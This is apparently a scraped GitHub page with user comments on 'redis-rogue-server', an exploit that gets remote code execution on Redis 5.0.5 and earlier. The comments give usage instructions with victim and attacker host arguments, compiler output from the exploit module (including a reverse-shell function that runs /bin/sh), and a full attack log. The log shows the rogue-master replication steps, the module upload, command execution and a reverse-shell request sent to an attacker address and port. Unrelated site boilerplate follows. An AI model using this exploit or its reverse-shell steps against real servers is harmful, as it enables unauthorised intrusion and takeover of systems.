Redis(<=5.0.5) RCE
License: Apache License 2.0
If someone else commes accross this.
I tried running the script with python3 redis-rogue-server.py. This resulted in
[->] b'$1\r\n\x83\r\n'
[err ] UnicodeDecodeError('gb18030', b'$1\r\n\x83\r\n', 4, 5, 'illegal multibyte sequence')
Running ./redis-rogue-server.py worked fine. The line before the error is then:
[->] b'$0\r\n\r\n'
Hi, I have the next message when I do make, do you know if it is ok or is there any issue?
xxxxxx@xxxxxxx:~/redis-rogue-server/RedisModulesSDK/exp$ make
make -C ../rmutil
make[1]: Entering directory '/redis-rogue-server/RedisModulesSDK/rmutil'
ar rcs librmutil.a util.o strings.o sds.o vector.o alloc.o periodic.o
make[1]: Leaving directory '/redis-rogue-server/RedisModulesSDK/rmutil'
gcc -I../ -Wall -g -fPIC -lc -lm -std=gnu99 -c -o exp.o exp.c
exp.c: In function ‘DoCommand’:
exp.c:16:15: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
char *cmd = RedisModule_StringPtrLen(argv[1], &cmd_len);
^~~~~~~~~~~~~~~~~~~~~~~~
exp.c:23:8: warning: implicit declaration of function ‘strlen’ [-Wimplicit-function-declaration]
if (strlen(buf) + strlen(output) >= size) {
^~~~~~
exp.c:23:8: warning: incompatible implicit declaration of built-in function ‘strlen’
exp.c:23:8: note: include ‘<string.h>’ or provide a declaration of ‘strlen’
exp.c:27:4: warning: implicit declaration of function ‘strcat’ [-Wimplicit-function-declaration]
strcat(output, buf);
^~~~~~
exp.c:27:4: warning: incompatible implicit declaration of built-in function ‘strcat’
exp.c:27:4: note: include ‘<string.h>’ or provide a declaration of ‘strcat’
exp.c:29:66: warning: incompatible implicit declaration of built-in function ‘strlen’
RedisModuleString *ret = RedisModule_CreateString(ctx, output, strlen(output));
^~~~~~
exp.c:29:66: note: include ‘<string.h>’ or provide a declaration of ‘strlen’
exp.c: In function ‘RevShellCommand’:
exp.c:41:14: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
char *ip = RedisModule_StringPtrLen(argv[1], &cmd_len);
^~~~~~~~~~~~~~~~~~~~~~~~
exp.c:42:18: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
char *port_s = RedisModule_StringPtrLen(argv[2], &cmd_len);
^~~~~~~~~~~~~~~~~~~~~~~~
exp.c:48:24: warning: implicit declaration of function ‘inet_addr’; did you mean ‘si_addr’? [-Wimplicit-function-declaration]
sa.sin_addr.s_addr = inet_addr(ip);
^~~~~~~~~
si_addr
exp.c:57:3: warning: null argument where non-null required (argument 2) [-Wnonnull]
execve("/bin/sh", 0, 0);
^~~~~~
exp.c: In function ‘RedisModule_OnLoad’:
exp.c:68:5: warning: this ‘if’ clause does not guard... [-Wmisleading-indentation]
if (RedisModule_CreateCommand(ctx, "system.exec",
^~
exp.c:71:2: note: ...this statement, but the latter is misleadingly indented as if it were guarded by the ‘if’
if (RedisModule_CreateCommand(ctx, "system.rev",
^~
ld -o exp.so exp.o -shared -Bsymbolic -L../rmutil -lrmutil -lc
Thanks in advance.
quick note for those who couldn't get a shell back, """you must specify the ports"""
Ex: python3 redis-rogue-server.py --rhost (victim's) --rport 6379 --lhost (Yours) --lport 6379 < or any port you want.
or try to exploit it manually :p
Update : apparently the issue is with loading the Command Execute Module because the redis command "MODULE" is not being recognized
###########################################""
I'm trying to use the script to exploit a windows x64 machine running Redis version 2.8.2402 but i keep getting an error that the "system" command is unknown so neither the interactive nor the reverse shell worked for me.
Do you have any idea why this is happening?
Below the command i executed and the output:
└─# python redis-rogue-server.py --rhost 10.10.192.11 --lhost 10.18.123.89 -v
| ___ \ | () | ___ \ / |
| |/ / | | ___ | |/ /_ __ _ _ _ ___ \ --. ___ _ ____ _____ _ __ | // _ \/ _ | / | | // _ \ / _| | | |/ _ \ --. / _ \ '\ \ / / _ \ '|
| |\ \ / (| | _ \ | |\ \ () | (| | || | __/ /_/ / / | \ V / / |
_| __|_,||/ _| __/ _, |_,_|_| _/ _|| _/ ___||
/ |
|/
@copyright n0b0dy @ r3kapig
[info] TARGET 10.10.192.11:6379
[info] SERVER 10.18.123.89:21000
[info] Setting master...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$12\r\n10.18.123.89\r\n$5\r\n21000\r\n'
[->] b'+OK\r\n'
[info] Setting dbfilename...
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
[->] b'+OK\r\n'
[->] b'PING\r\n'
[<-] b'+PONG\r\n'
[->] b'REPLCONF listening-port 6379\r\n'
[<-] b'+OK\r\n'
[->] b'REPLCONF capa eof\r\n'
[<-] b'+OK\r\n'
[->] b'PSYNC ? -1\r\n'
[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1\r\n$44320\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\xa6\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'
[info] Loading module...
[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
[->] b"-ERR unknown command 'MODULE'\r\n"
[info] Temerory cleaning up...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
[->] b'+OK\r\n'
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
[->] b'+OK\r\n'
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$11\r\nrm ./exp.so\r\n'
[->] b"-ERR unknown command 'system.exec'\r\n"
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 10.18.123.89
Reverse server port: 8888
[<-] b'*3\r\n$10\r\nsystem.rev\r\n$12\r\n10.18.123.89\r\n$4\r\n8888\r\n'
[<-] b'*3\r\n$10\r\nsystem.rev\r\n$12\r\n10.18.123.89\r\n$4\r\n8888\r\n'
[info] Reverse shell payload sent.
[info] Check at 10.18.123.89:8888
[info] Unload module...
[<-] b'*3\r\n$6\r\nMODULE\r\n$6\r\nUNLOAD\r\n$6\r\nsystem\r\n'
[->] b"-ERR unknown command 'system.rev'\r\n"
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.